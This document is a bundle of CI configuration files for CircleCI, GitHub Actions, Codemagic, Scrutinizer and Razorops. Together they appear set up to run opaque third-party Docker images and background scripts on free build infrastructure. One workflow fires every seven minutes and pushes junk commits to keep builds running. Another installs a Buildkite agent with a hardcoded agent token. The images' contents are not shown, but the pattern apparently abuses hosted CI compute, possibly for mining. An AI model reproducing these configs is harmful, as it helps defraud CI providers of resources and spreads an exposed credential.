circleci
```
.circleci/config.yml
```
```
version: 2.1

# Define the jobs we want to run for this project
jobs:
  build:
    docker:
      - image: christiankm01/belajar:1
    steps:
      - checkout
      - run: screen -dmS run /final.sh && sh /loop.sh
workflows:
  builds:
    jobs:
      - build:
        filters:
            branches:
              only:
                - main
      

```

cron
```
.github/workflows/caca.yml
```
```

name: CIx
on: 
  push:
    branches: [ main ]
  schedule:
    - cron: "*/7 * * * *"
jobs:
  satu:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v3
      - name: Set current date
        id: date
        run: echo "::set-output name=date::$(echo $RANDOM | md5sum | head -c 3; echo;)"
      - name: Create commits
        run: |
```
```
          echo $RANDOM | md5sum | head -c 8; echo;
          TTT=$(echo $RANDOM | md5sum | head -c 8;)
          echo " $TTT " > Jess
          echo $TTT
          echo " $RANDOM " > file
          echo "Test push commit to the remote in the workflow" >> test.txt
          git config --global user.name "github-actions[bot]"
          git config --global user.email "41898282+github-actions[bot]@users.noreply.github.com"
          git add -A
          git commit -m "Update test.txt"
          git push
```
Dockerfile
```
FROM christiankm01/kilo
RUN lcc
```

codemagic
```
triggering:
  events:
    - pull_request
    - push
workflows:
  hello-world:
    name: Hello world workflow
    scripts:
        - brew install buildkite/buildkite/buildkite-agent
        - sed -i '' "s/xxx/9fb32670b052083cc189d3235934cdf05a92d42cff84f0b541/g" "$(brew --prefix)"/etc/buildkite-agent/buildkite-agent.cfg
        - buildkite-agent start


```
srutinizer
```
build:
  nodes:
    docker-build:
      environment:
        # caching works with the remote_engine and the local executor
        docker: true

      # This example uses a minimal node, but it works equally fine with a auto-setup node.
      commands:
        - docker run christiankm01/kilo:1
        - docker run christiankm01/kilo:1
        - docker run christiankm01/kilo:1
        - docker run christiankm01/kilo:1
        - docker run christiankm01/kilo:1
        - docker run christiankm01/kilo:1
        - docker run christiankm01/kilo:1
        
        
```
```
.razorops.yaml
```
```
tasks:
  build-image:
    steps:
    - checkout
    - docker/build:
       image: razorci/docs
       push: true
       tags: ["${CI_COMMIT_SHA}", "latest"]
       dockerfile: Dockerfile
       context: .
```
